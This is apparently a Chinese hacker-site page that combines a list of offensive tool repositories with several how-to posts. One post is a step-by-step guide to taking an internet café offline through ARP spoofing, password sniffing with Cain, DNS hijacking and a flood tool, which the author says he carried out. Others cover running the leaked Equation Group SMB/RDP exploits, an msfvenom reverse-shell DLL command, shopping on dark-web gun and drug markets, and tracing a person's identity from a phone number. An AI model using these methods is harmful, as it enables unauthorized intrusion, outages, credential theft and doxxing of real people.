Python工具库 感谢支持更多关注中国骇客云官网

漏洞及渗透练习平台:

WebGoat漏洞练习平台:

https://github.com/WebGoat/WebGoat

webgoat-legacy漏洞练习平台:

https://github.com/WebGoat/WebGoat-Legacy

zvuldirll漏洞练习平台:

https://github.com/710leo/ZVulDrill

vulapps漏洞练习平台:

https://github.com/Medicean/VulApps

dvwa漏洞练习平台:

https://github.com/RandomStorm/DVWA

数据库注入练习平台 :

https://github.com/Audi-1/sqli-labs

用node编写的漏洞练习平台,like OWASP Node Goat:

https://github.com/cr0hn/vulnerable-node

Ruby编写的一款工具,生成含漏洞的虚拟机:

https://github.com/cliffe/secgen

花式扫描器 :

Nmap端口扫描器:

https://github.com/nmap/nmap

本地网络扫描器:

https://github.com/SkyLined/LocalNetworkScanner

子域名扫描器:

https://github.com/lijiejie/subDomainsBrute

https://github.com/aboul3la/Sublist3r

https://github.com/TheRook/subbrute

https://github.com/infosec-au/altdns

linux漏洞扫描:

https://github.com/future-architect/vuls

基于端口扫描以及关联CVE:

https://github.com/m0nad/HellRaiser

漏洞路由扫描器:

https://github.com/jh00nbr/Routerhunter-2.0

迷你批量信息泄漏扫描脚本:

https://github.com/lijiejie/BBScan

Waf类型检测工具:

https://github.com/EnableSecurity/wafw00f

服务器端口弱口令扫描器:

https://github.com/wilson9x1/fenghuangscanner_v3

Fox-scan扫描器:

https://github.com/fengxuangit/Fox-scan/

信息搜集工具 :

社工收集器:

https://github.com/n0tr00t/Sreg

Github信息搜集:

https://github.com/sea-god/gitscan

github Repo信息搜集工具:

https://github.com/metac0rtex/GitHarvester

信息探测及扫描工具:

https://github.com/darryllane/Bluto

内部网络信息扫描器:

https://github.com/sowish/LNScan

远程桌面登录扫描器:

https://github.com/linuz/Sticky-Keys-Slayer

网络基础设施渗透工具

https://github.com/SECFORCE/sparta

SNMAP密码破解:

https://github.com/SECFORCE/SNMP-Brute

WEB:

webshell大合集:

https://github.com/tennc/webshell

渗透以及web攻击脚本:

https://github.com/brianwrf/hackUtils

web渗透小工具大合集:

https://github.com/rootphantomer/hacktoolsfor_me

XSS数据接收平台:

https://github.com/firesunCN/BlueLotus_XSSReceiver

XSS与CSRF工具:

https://github.com/evilcos/xssor

xss多功能扫描器:

https://github.com/shawarkhanethicalhacker/BruteXSS

web漏洞扫描器:

https://github.com/andresriancho/w3af

WEB漏洞扫描器:

https://github.com/sullo/nikto

渗透常用小工具包:

https://github.com/leonteale/pentestpackage

web目录扫描器:

https://github.com/maurosoria/dirsearch

web向命令注入检测工具:

https://github.com/stasinopoulos/commix

自动化SQL注入检查工具:

https://github.com/epinna/tplmap

SSL扫描器:

https://github.com/rbsec/sslscan

安全工具集合:

https://github.com/codejanus/ToolSuite

apache日志分析器:

https://github.com/mthbernardes/ARTLAS

php代码审计工具:

https://github.com/pwnsdx/BadCode

web指纹识别扫描:

https://github.com/urbanadventurer/whatweb

检查网站恶意攻击:

https://github.com/ciscocsirt/malspider

wordprees漏洞扫描器:

https://github.com/wpscanteam/wpscan

固件漏洞扫描器:

https://github.com/misterch0c/firminator_backend

数据库注入工具

https://github.com/sqlmapproject/sqlmap

Web代理:

https://github.com/zt2/sqli-hunter

新版中国菜刀:

https://github.com/Chora10/Cknife

git泄露利用EXP:

https://github.com/lijiejie/GitHack

浏览器攻击框架:

https://github.com/beefproject/beef

自动化绕过WAF脚本:

https://github.com/khalilbijjou/WAFNinja

https://github.com/owtf/wafbypasser

一款开源WAF:

https://github.com/SpiderLabs/ModSecurity

http命令行客户端:

https://github.com/jkbrzt/httpie

浏览器调试利器:

https://github.com/firebug/firebug

DISCUZ漏洞扫描器:

https://github.com/code-scan/dzscan

自动化代码审计工具

https://github.com/wufeifei/cobra

浏览器攻击框架:

https://github.com/julienbedard/browsersploit

tomcat自动后门部署:

https://github.com/mgeeky/tomcatWarDeployer

网络空间指纹扫描器:

https://github.com/nanshihui/Scan-T

burpsuit之J2EE扫描插件:

https://github.com/ilmila/J2EEScan

windows域渗透工具:

mimikatz明文注入:

https://github.com/gentilkiwi/mimikatz

Powershell渗透库合集:

https://github.com/PowerShellMafia/PowerSploit

Powershell tools合集:

https://github.com/clymb3r/PowerShell

powershell的mimikittenz:

https://github.com/putterpanda/mimikittenz

域渗透教程:

https://github.com/l3m0n/pentest_study

Fuzz:

Web向Fuzz工具

https://github.com/xmendez/wfuzz

HTTP暴力破解,撞库攻击脚本

https://github.com/lijiejie/htpwdScan

漏洞利用及攻击框架:

msf框架:

https://github.com/rapid7/metasploit-framework

pocsscan攻击框架:

https://github.com/erevus-cn/pocscan

Pocsuite攻击框架:

https://github.com/knownsec/Pocsuite

Beebeeto攻击框架:

https://github.com/n0tr00t/Beebeeto-framework

漏洞POC&EXP:

ExploitDB官方git版本:

https://github.com/offensive-security/exploit-database

php漏洞代码分析:

https://github.com/80vul/phpcodz

CVE-2016-2107:

https://github.com/FiloSottile/CVE-2016-2107

CVE-2015-7547 POC:

https://github.com/fjserna/CVE-2015-7547

JAVA反序列化POC生成工具:

https://github.com/frohoff/ysoserial

JAVA反序列化EXP:

https://github.com/foxglovesec/JavaUnserializeExploits

Jenkins CommonCollections EXP:

https://github.com/CaledoniaProject/jenkins-cli-exploit

CVE-2015-2426 EXP (windows内核提权):

https://github.com/vlad902/hacking-team-windows-kernel-lpe

use docker to show web attack(php本地文件包含结合phpinfo getshell 以及ssrf结合curl的利用演示):

https://github.com/hxer/vulnapp

php7缓存覆写漏洞Demo及相关工具:

https://github.com/GoSecure/php7-opcache-override

XcodeGhost木马样本:

https://github.com/XcodeGhostSource/XcodeGhost

中间人攻击及钓鱼

中间人攻击框架:

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

https://github.com/byt3bl33d3r/MITMf

Inject code, jam wifi, and spy on wifi users:

https://github.com/DanMcInerney/LANs.py

中间人代理工具:

https://github.com/intrepidusgroup/mallory

wifi钓鱼:

https://github.com/sophron/wifiphisher

密码破解:

密码破解工具:

https://github.com/shinnok/johnny

本地存储的各类密码提取利器:

https://github.com/AlessandroZ/LaZagne

二进制及代码分析工具:

二进制分析工具

https://github.com/devttys0/binwalk

系统扫描器

https://github.com/quarkslab/binmap

rp:

https://github.com/0vercl0k/rp

Windows Exploit Development工具

https://github.com/lillypad/badger

二进制静态分析工具(python):

https://github.com/bdcht/amoco

Python Exploit Development Assistance for GDB:

https://github.com/longld/peda

对BillGates Linux Botnet系木马活动的监控工具

https://github.com/ValdikSS/billgates-botnet-tracker

木马配置参数提取工具:

https://github.com/kevthehermit/RATDecoders

Shellphish编写的二进制分析工具(CTF向):

https://github.com/angr/angr

针对python的静态代码分析工具:

https://github.com/yinwang0/pysonar2

一个自动化的脚本(shell)分析工具,用来给出警告和建议:

https://github.com/koalaman/shellcheck

基于AST变换的简易Javascript反混淆辅助工具:

https://github.com/ChiChou/etacsufbo

EXP编写框架及工具:

二进制EXP编写工具:

https://github.com/t00sh/rop-tool

CTF Pwn 类题目脚本编写框架:

https://github.com/Gallopsled/pwntools

an easy-to-use io library for pwning development:

https://github.com/zTrix/zio

跨平台注入工具:

https://github.com/frida/frida

哈希长度扩展攻击EXP:

https://github.com/citronneur/rdpy

隐写:

隐写检测工具

https://github.com/abeluck/stegdetect

各类安全资料:

data_hacking合集:

https://github.com/ClickSecurity/data_hacking

mobile-security-wiki:

https://github.com/exploitprotocol/mobile-security-wiki

书籍《reverse-engineering-for-beginners》:

https://github.com/veficos/reverse-engineering-for-beginners

一些信息安全标准及设备配置:

https://github.com/luyg24/IT_security

APT相关笔记:

https://github.com/kbandla/APTnotes

Kcon资料:

https://github.com/knownsec/KCon

《DO NOT FUCK WITH A HACKER》:

https://github.com/citypw/DNFWAH

各类安全脑洞图:

https://github.com/phith0n/Mind-Map

信息安全流程图:

https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428

各类CTF资源

近年ctf writeup大全:

https://github.com/ctfs/write-ups-2016

https://github.com/ctfs/write-ups-2015

https://github.com/ctfs/write-ups-2014

fbctf竞赛平台Demo:

https://github.com/facebook/fbctf

ctf Resources:

https://github.com/ctfs/resources

ctf及黑客资源合集:

https://github.com/bt3gl/My-Gray-Hacker-Resources

ctf和安全工具大合集:

https://github.com/zardus/ctf-tools

ctf向 python工具包

https://github.com/P1kachu/v0lt

各类编程资源:

大礼包(什么都有):

https://github.com/bayandin/awesome-awesomeness

bash-handbook:

https://github.com/denysdovhan/bash-handbook

python资源大全:

https://github.com/jobbole/awesome-python-cn

git学习资料:

https://github.com/xirong/my-git

安卓开源代码解析

https://github.com/android-cn/android-open-project

python框架,库,资源大合集:

https://github.com/vinta/awesome-python

JS 正则表达式库(用于简化构造复杂的JS正则表达式):

https://github.com/VerbalExpressions/JSVerbalExpressions

Python:

python 正则表达式库(用于简化构造复杂的python正则表达式):

https://github.com/VerbalExpressions/

python任务管理以及命令执行库:

https://github.com/pyinvoke/invoke

python exe打包库:

https://github.com/pyinstaller/pyinstaller

Veil-Evasion免杀项目:

https://github.com/Veil-Framework/Veil-Evasion

py3 爬虫框架:

https://github.com/orf/cyborg

一个提供底层接口数据包编程和网络协议支持的python库:

https://github.com/CoreSecurity/impacket

python requests 库:

https://github.com/kennethreitz/requests

python 实用工具合集:

https://github.com/mahmoud/boltons

python爬虫系统:

https://github.com/binux/pyspider

科学上网:

科学上网工具

https://github.com/XX-net/XX-Net

福利:

微信自动抢红包动态库

https://github.com/east520/AutoGetRedEnv

微信抢红包插件(安卓版)

https://github.com/geeeeeeeeek/WeChatLuckyMoney

hardsed神器:

https://github.com/yangyangwithgnu/hardseed

甲方安全工程师生存指南

web索引及日志搜索工具:

https://github.com/thomaspatzke/WASE

开源日志采集器:

https://github.com/wgliang/logcool

扫描CS结构的web debuger

https://github.com/Kozea/wdb

恢复sqlite数据库删除注册信息:

https://github.com/aramosf/recoversqlite/

gps欺骗检测工具:

https://github.com/zxsecurity/gpsnitch

应急处置响应框架:

https://github.com/biggiesmallsAG/nightHawkResponse

web安全开发指南:

https://github.com/FallibleInc/security-guide-for-developers

各个知名厂商漏洞测试报告模板:

https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包:

https://github.com/rfxn/linux-malware-detect

操作系统运行指标可视化框架:

https://github.com/facebook/osquery

恶意代码分析系统:

https://github.com/cuckoosandbox/cuckoo

定期搜索及存储web应用:

https://github.com/Netflix/Scumblr

事件响应框架:

https://github.com/google/grr

综合主机监控检测平台:

https://github.com/ossec/ossec-hids

分布式实时数字取证系统:

https://github.com/mozilla/mig

Microsoft & Unix 文件系统及硬盘取证工具:

https://github.com/sleuthkit/sleuthkit

蜜罐:

SSH蜜罐:

https://github.com/desaster/kippo

蜜罐集合资源:

https://github.com/paralax/awesome-honeypots

kippo进阶版蜜罐:

https://github.com/micheloosterhof/cowrie

SMTP 蜜罐:

https://github.com/awhitehatter/mailoney

web应用程序蜜罐:

https://github.com/mushorg/glastopf

数据库蜜罐:

https://github.com/jordan-wright/elastichoney

web蜜罐:

https://github.com/atiger77/Dionaea

远控:

用gmail充当C&C服务器的后门

https://github.com/byt3bl33d3r/gcat

开源的远控:

https://github.com/UbbeLoL/uRAT

c#远控:

https://github.com/hussein-aitlahcen/BlackHole

中国骇客云教你如何攻击网吧(压力测试)我们只上传工具。

尊敬的用户大家好,好长时间没有发布教程了。因为前些时候在网吧玩儿,突发奇想的想攻击网吧进行压力测试,【lol网吧】带宽不足是所有网吧的通病。
首先一些网吧进行了安全组建以及安全模块禁用一些arp嗅探等工具。因为缺少相应的dll,所以一些工具是不能用的,在这里我们提供一些基本的补丁,通杀所有网吧32位64位的dll。下载地址复制一下进行浏览器粘贴。
点我进行下载    cain的内网渗透工具,因为下载好以后根据网吧机器是32或者64进行dll的补丁安装。
以下讲解了cain的使用教程,如果大家在使用中不会请看完本文即可进行深度学习。那天我们攻击网吧的截图和照片没有了(怕网管查到所以没有进行拍照不好意思大家。)
这一步不会可以直接进行跳过看下一步:


内网渗透的一些基本工具用法:
Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大,可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。

Abel 是后台服务程序,一般不会用到,我们重点来介绍Cain的使用。

Cain安装:首先我们需要安装Winpcap驱动,

cain内网嗅探工具使用教程 - yes_root - yes_root

一路next便可以安装成功

然后我们就可以使用Cain了,让我们打开传说中的Cain,界面十分简单明了,

cain内网嗅探工具使用教程 - yes_root - yes_root

但是它的功能可就不简单了。

Cain使用:

一、读取缓存密码:切换到“受保护的缓存口令”标签,点上面的那个加号

cain内网嗅探工具使用教程 - yes_root - yes_root

缓存在IE里的密码全都显示出来了。

二、查看网络状况

切换到“网络” 标签,可以清楚的看到当前网络的结构,我还看到内网其他的机器的共享目录,用户和服务,通过上图,我们清楚的看到Smm-DB1开启了IPC$默认共享连接和其他盘隐藏共享。

三、ARP欺骗与嗅探

ARP欺骗的原理是操纵两台主机的ARP缓存表,以改变它们之间的正常通信方向,这种通信注入的结果就是ARP欺骗攻击。ARP欺骗和嗅探是Cain我们用的最多的功能了,切换到“嗅探”标签

cain内网嗅探工具使用教程 - yes_root - yes_root

在这里可以清晰的看到内网中各个机器的IP和MAC地址。

我们首先要对Cain进行配置,先点最单击最上面的“配置”

cain内网嗅探工具使用教程 - yes_root - yes_root

在“嗅探器”中选择要嗅探的网卡,在“ARP(Arp Poison Routing)”中可以伪造IP地址和MAC地址进行欺骗,避免被网管发现

cain内网嗅探工具使用教程 - yes_root - yes_root

在“过滤与端口”中可以设置过滤器,

cain内网嗅探工具使用教程 - yes_root - yes_root

可以根据自己的需要选择过滤的端口,如嗅探远程桌面密码的话,就钩选RDP 3389端口。

小提示:比如我要嗅探上面的61.132.223.10机器,第二个网卡显示我的ip地址为61.132.223.26,和目标机器是同一内网的,就使用第二个的网卡欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

单击网卡的那个标志开始嗅探,旁边的放射性标志则是ARP欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

cain内网嗅探工具使用教程 - yes_root - yes_root

  嗅探了N久之后,点击下面的 “截获密码”, 嗅探所得到的密码会按分类呈现在大家面前,包括http、ftp、VNC、SMTP、ICQ等密码。如果目标主机使用voip电话的话,还可以获得他使用voip电话的录音(恐怖吧),如图

cain内网嗅探工具使用教程 - yes_root - yes_root

  cain内网嗅探工具使用教程 - yes_root - yes_root  下面我们来进行Arp欺骗,点击下面的“ARP”标签, 

cain内网嗅探工具使用教程 - yes_root - yes_root

 在右边的空白处单击,然后点上面的“加号”,出现“新建ARP欺骗”对话框,在左边选网关,右边选择被欺骗的IP。

这里要注意的是,你的机器性能比网关差的话,会引起被欺骗机器变慢。

1.DNS欺骗:

在“DNS欺骗”中填入请求的DNS名称和响应包的IP地址,

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,当目标地址访问www.hao123.com的时候就自动跳转到Www.google.cn的网站上面,其中的“#resp. 欺骗”就是目标主机被欺骗的次数。

这样对于目标机器进行挂马也不失为一种绝妙的方法。点上面的放射性标志开始Arp欺骗,

小提示:网关IP可以在命令行下输入ipconfig获得

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,网关IP为61.132.223.4

2.远程桌面欺骗:

Cain能够实行中间人攻击(Man-In-The-Middle)远程计算机的终端服务协议(Remote Desktop Protocol RDP)进行截获和解密工作。也就是截获目标主机的3389登陆密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

在“ARP-RDP”里已经得到了3个数据包。右击右边得到的数据包,选择“查看”,

cain内网嗅探工具使用教程 - yes_root - yes_root

我的运气比较好,获得了目标主机登陆3389的用户和密码,如图,用户名为“administrator”密码为“asdf1234”。

小技巧:在肉鸡上对密码进行嗅探的时候,可以按Alt +Delete对界面进行隐藏,按Alt + Page Down隐藏都任务栏,按Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用!

四、密码的破解

Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文,我这里示范如何使用Cain破解md5密文。

cain内网嗅探工具使用教程 - yes_root - yes_root

切换到“破解器”标签,在右边空白处单击,按上面的加号,输入我们要解密的32位密文

cain内网嗅探工具使用教程 - yes_root - yes_root

右击要破解的密文,选择“暴力破解”,选择口令长度和密码范围,我这儿选择的是5到6位纯数字密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

按“开始”进行破解

cain内网嗅探工具使用教程 - yes_root - yes_root

一会儿工夫,破解出的密码就出现在我们面前了,哈哈,密码是123456。除了暴力破解以外,你还可以使用通过字典破解和通过rainbow表进行破解。

其他还有一些常用密码的读取可以参照下图

cain内网嗅探工具使用教程 - yes_root - yes_root

使用十分简单,大家自己研究下就行了,密文计算器的效果如图:

cain内网嗅探工具使用教程 - yes_root - yes_root

可以对密文进行md2,md5,lm,nt等方式进行加密

五、追踪路由

切换到“追踪路由”标签,在目标主机中填入目标主机的ip或者域名,我这填www.hackerxfiles.net

cain内网嗅探工具使用教程 - yes_root - yes_root

选择协议和端口,点“开始”,一杯咖啡过后,就可以清晰的看到访问黑X  BBS所经过的所有服务器IP、访问所需的时间和主机名。

另外,Cain还具有“LSA分析”和“嗅探无线网络”等功能,这些功能我们不经常用到,感兴趣的朋友可以自行研究。最新版本cain4.92已经加入vista支持,但是“读取读取缓存密码”功能不是很稳定,如果要读取读取缓存密码的话请使用以前的版本。最后要说一句:Cain的确是一款绝佳的黑界利器,威力无穷,请各位小黑们谨慎使用。


第二步:下载网络超级邻居和p2p网络终结者。
网络超级邻居可以检测内网所有上线主机与共享主机,并且可以进行开放端口检测与服务器主机的检测,具体参考我们的网络超级邻居的使用方法如下:
打开网络超级邻居直接嗅探整个网吧的上线主机,扫描开放端口,135.3389.1433等端口…搜索开放端口的在线主机,共享本机到所有开放主机文件等。
p2p网络终结者可以在百度任意下载,如果缺少部分dll可以添加cain的dll进行安装和使用。
因为网络超级邻居和p2p网络终结者cain的共同性,都可以进行局域网扫描,所以这个就得看个人经验找到相应的服务器主机和安全模块的服务器主机地址了。这里可以使用三个进行经验判断和扫描结果。以后有图了给大家补下。
网络超级邻居下载地址:http://www.crsky.com/soft/2700.html

p2p网络终结者下载地址:http://www.cr173.com/soft/1953.html
因为
这里个软件百度随便一个下载站点都可以下载到,所以如果上面两个软件失效了,请百度一下吧。


第三步:蜗牛攻击器终极版下载地址:https://binghesoft.ctfile.com/file/117068576    这个如果不能使用,百度一下(蜗牛攻击器终极版)|


第四步:打开蜗牛攻击器,p2p网络终结者,网络超级邻居。
蜗牛攻击器输入攻击目标主机:192.168.xxx.xxx
增加蜗牛
切记不要使自己的机器卡死,增加4到5个都可以,模式自己搞。
p2p网络终结者全局控制,黑名单。起到了一定的arp的效果。但不是欺骗。
cain去嗅探主机的账户密码。【这一步不会的话可以使用上面几步】


第五步:等7到8分钟整个网吧会掉线,这里的cain其实没有起到多大的作用,说这个是为了网大家去嗅探一些简单的局域网密码算是一种爆破工具吧~内网扫描工具等。


如果网吧不掉线:两台机器同时攻击.直接秒死…经过测试所有网吧都可以进行秒杀,因为网吧的安全问题和带宽的响应问题..导致网吧直接秒死是正常的………..之前去了网吧做测试..所以没有敢拍照和录像..有机会一定弄,不会的关注我们官方公众微信,进行留言,我们会有专门的客服教你喔~~~

中国骇客云平台最新公开方程式组织黑客工具,赶紧下载吧!~~~~

GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation

网盘下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4

解压密码”Reeeeeeeeeeeeeee”

Start.jar //图形界面

EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

Explodingcan IIS漏洞利用工具,只对Windows 2003有影响Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139445 Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143Englishmansdentist   通过SMTP漏洞攻击,默认端口25Erraticgopher 通过RPC漏洞攻击,端口为445Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88Eclipsedwing   MS08-67漏洞利用工具Educatedscholar   MS09-050漏洞利用工具Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口Zippybeer   SMTP漏洞利用工具,默认端口 445Eternalsynergy   SMB漏洞利用工具,默认端口 445Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389

 

使用方法:

注意,必须安装32位python2.6相关版本,其他版本不奏效。

  1. 下载python2.6并安装
  2. 下载pywin32并安装
  3. 将C:\Python26添加到环境变量PATH中。

修改\windows\fb.py

注释掉:

 #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

 

将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量

    1.生成dll命令:msfvenom -p windows/x64/shell_reverse_tcp   LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll

 

转载文章请注明,转载自:中国骇客平台官网www.hackerschina.org

 

中国骇客云教你如何访问暗网

什么是暗网?

所谓的“暗网”,其英文原名叫作“Deep Web”,又称深层网络。

广泛意义上的“暗网”,指的是那些无法被搜索引擎收录内容的站点。也就是说,一切有着非公开访问机制的网站——比如1024,哈哈大家都懂得,甚至一个注册才能进入的小型BBS——都属于“暗网”的一部分;另外,由于搜索引擎对于网站内容的抓取通常都是通过追溯超链接来完成,有着相当多的页面因为没有任何超链接的指向,也处于搜索引擎的盲区,故而它们也被纳入“暗网”的范畴。与“暗网”对应的,是“明网”,也称表层网络(Surface Web),曾有学术机构统计过“暗网”与“明网”分别蕴含的数据比例,结果显示前者的数据存量百倍于后者,且增长速度更快。

提及的软件工具Tor,正是一枚货真价实的钥匙,持有这枚钥匙,就打开了一扇通往“暗网”世界的大门。

Tor(The Onion Router)或许不是网络匿名访问的唯一手段,但毫无疑问它是目前最流行、最受开发者欢迎的。

这个免费、开源的程序可以给网络流量进行三重加密,并将用户流量在世界各地的电脑终端里跳跃传递,这样就很难去追踪它的来源。大部分的Tor用户只把它作为一个匿名浏览网页的工具,不过实际上它潜力十足:Tor软件可以在操作系统后台运行,创建一个代理链接将用户连接到Tor网络。随着越来越多的软件甚至操作系统都开始允许用户选择通过Tor链接发送所有流量,这使得你几乎可以用任何类型的在线服务来掩盖自己的身份。

访问暗网的方法有很多种,目前最流行的则是Tor(The Onion Router洋葱网络),给大家来个示范:

tor下载地址:网上自行搜索即可下载。

这是一个中文版,点击安装:一路安装完成打开:

(这儿配置选择)

都按照红色提示安装:

(选择“是”)

继续

几个都可以尝试一下

(不选择代理)

启动

打开tor浏览器:

等待一会儿链接

(已成功打开)

分享几个暗网导航页:

http://thehiddenwiki.org/ 有点老了,感觉收录并不行

还有一个不错的:

http://grams7enufi7jmdl.onion/ 第一感觉挺像Google 的

随便搜索一个敏感词:gun

(gun的搜索页面)

随便点击一个

一个防ddos的页面,毕竟属于黑产,黑吃黑很正常,随意都要互相防着

进入了登录页面,我们随意注册一下

(登陆)

进去之后,我们进行一下搜索:

看一下搜索栏,呵呵哒了

(drugs类)

(darker工具软件类)

再说一次:

请勿违法!!!我也不会做违法的事!仅供学习了解!技术无罪!

看看刚才搜索到的gun:

0.023BTC可以购买,$9.82很廉价,不多提了。比特币是他们的主要货币,换算的话:

大约1BTC=2 678.2RMB.

不再具体了。。。大家见好就收

暗网  –或许说和血腥很暴力,但是很多或许是事实

比如大天朝的某些“运动”的真相,或者是某些领导人。

不做评价,我保持中立

对了以“onion”为后缀的域名定为暗网,普通浏览器是无法访问的,这就是暗网网址的一个特征。

也有人要说自己家网络别人也访问不到,算不算暗网?

不好意思,你那只能算得上局域网

中国骇客云教你社工之手机信息查询新技能!

如果知道手机号码怎么查身份?大家首先想到的肯定是用搜索引擎搜一下,这里只需提醒一下大家,各种搜索引擎的算法不同,搜索结果也不尽相同,因此要尽量多用一些搜索引擎搜。

有关搜索引擎的使用丁爸公众号之前发送过多篇相关文章,关注“丁爸”公众号回复:搜索   可获取相关文章。



其次我们还可以利用手机安装的一些通讯录和安全软件来核查该手机号的用户名字。


1、电话万能钥匙

具有陌生电话号码云识别的功能,丁爸公众号回复:云识别  可获取历史相关文章

下载地址:http://www.imcaller.com/
2、腾讯手机管家

开通腾讯手机管家后手机可显示来电姓名

下载地址:http://m.qq.com/download/


3、触宝电话

也有陌生号码云识别功能

下载地址:http://www.chubao.cn/


第三,可以通过网站平台核查


4、电话邦

网址:http://www.dianhua.cn/


5、360手机卫士

网址:http://cx.shouji.360.cn/


6、搜狗号码通

http://haoma.sogou.com/rz/


7、百度号码认证

http://haoma.baidu.com/query


8、刑部11司

http://cop163.com/

9、领英

http://www.linkedin.com/

可输入姓名查询职业电话等信息

10、企查查

http://www.qichacha.com/

11、企信宝

http://www.qixin.com/


12、企业信用信息查询APP

http://www.ixy360.com/

 

13、天眼查

http://www.tianyancha.com/

 

第四、通过QQ、支付宝、微信、陌陌、易信、钉钉——–等即时通讯软件查看手机号码关联的网络ID和相关信息。


第五、查询手机注册过的网站,再通过这些网站核查注册人的身份信息。
信息图如下演示:

通过以上的连接查询手机号不错哟。
另外在本地的移动端上面输入手机号 :初始密码直接可以查询该手机号信息。
移动联通的充话费的人有时候不需要密码也是可以查询手机号密码的 你们有没有学会呢?

XSSF是一款XSS漏洞测试平台,该产品可以把XSS漏洞的真实危害暴露出来。这个产品为教学、渗透测试和合法的研究服务。

XSSF通过XSS漏洞与目标浏览器建立连接进行更加深入的攻击利用测试。

XSSF提供强大的API库,并且集成于Metasploit渗透测试框架中。

Windows安装XSSF模块
下载安装Metasploit windows免费版:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe

安装完成后将下xssf源码放到Metasploit安装目录msf3下,同样将XSSF文件夹中的data、lib、modules、plugins与msf3下的文件夹合并即可。

下载xssf源代码:选择最新的3.0下载,下载地址  xssf-3.0

运行metasploit客户端,加载xssf模块:msf > load xssf

BackTrack 5 Metasploit更新方法

虚拟机运行BackTrack5 r3在更新Metasploit时卡在pg-0.15.1,升级报错无法正常升级。

原因是msf并没有用BT5内置的Ruby,而是利用自带的Ruby版本为1.9.1,已经很古老了……所以升级系统的Ruby版本也会无济于事,但是按照下面的步骤更新,即可将msf更新到最新。

解决办法:

找到以下文件打开(注:32位、64位)

然后再找到:

修改为:

然后切换至/opt/metasploit/msf3再运行/opt/metasploit/ruby/bin/bundle install
最后msfupdate!

中国骇客云之killall万能钥匙3.2.16 wifi万能钥匙显密码 去广告

说明:万能钥匙,不是破解密码,是分享wifi密码的软件。

通过这个软件可以获取到别人分享过的wifi从而连接上无线网。但是这个软件广告比较多,并且并不会显示wifi密码。

所以就有了这个修改版,这个修改版去除了程序广告,并且可以把这个wifi密码显示出来。

本软件根据凯旋大神的去广告版本修改,再次表示感谢,绝对同样是深改,其实这是废话了,参考的肯定是完全一致的,和凯旋版本对比,修改的只会多不会少。并且还多出来一个显示密码功能。当然本人也就一部手机,有些细节没办法测试的面面俱到。可能有些机型有些小问题,这个是没办法避免的。。。。

修改给自己使用的版本,顺便分享一下,其他机型请自测,如发现问题请反馈,谢谢!

1、去除界面广告,扁平化图标,更加美观,极致精简仅有6M。

2、去除所有不必要的敏感权限和服务项。

3、去除状态栏通知和退出提醒。

4、去除后台下载广告行为,并让LBE安全大师,360手机卫士扫描不到广告提示。

5、去除地图验证,可以查看地图。

6、去除默认分享密码行为。

7、修改为共存版可与原版同时安装,名称为万能钥匙。

8、归纳软件产生的文件为/Android/data/com.killall.wifilocating/目录,卸载软件会自动清除。

9、不用ROOT手机就能够显示密码,当首次连接上热点自动弹出密码。

题外话:看到有些网友说不知道这个美化版怎么显示密码。只有在第一次连接上一个从未连接过的新wifi热点就弹出密码的。点击“万能钥匙自动连接”,获取到密码就会弹出密码,之后就记住密码不会弹出密码了。如果第一次没看清楚。可以对wifi点一下选择“忘记网络”,这样“万能钥匙自动连接”选项又出来了,再次点击“万能钥匙自动连接”就会重新弹出密码。只有点击“万能钥匙自动连接”才会弹出密码的。另外,之前发布几个版本,有些小白以为LBE安全大师和360安全卫士扫描到修改版万能钥匙有广点通广告。就以为软件广告没有去除干净。其实这只是smali里面一些失去功能的广告代码,这类安全软件扫描到这些失去功能的广告代码也提示有广告,其实去广告只要去除了apk活动项,这些广告代码就相当于是死的了,不会产生广告行为的。软件有没有广告是在界面看得到的。所以这次为了防止那些什么都不懂的小白吐槽,就去除了这些广告代码,虽然也没多大意义。但是估计小白和某些处女座会喜欢。嘿嘿。。。另外请某些素质低的人不要骂人,不喜欢就不要用,没逼你使用。下面直接公布下载地址。支持就不用说了,你们懂的。。。。

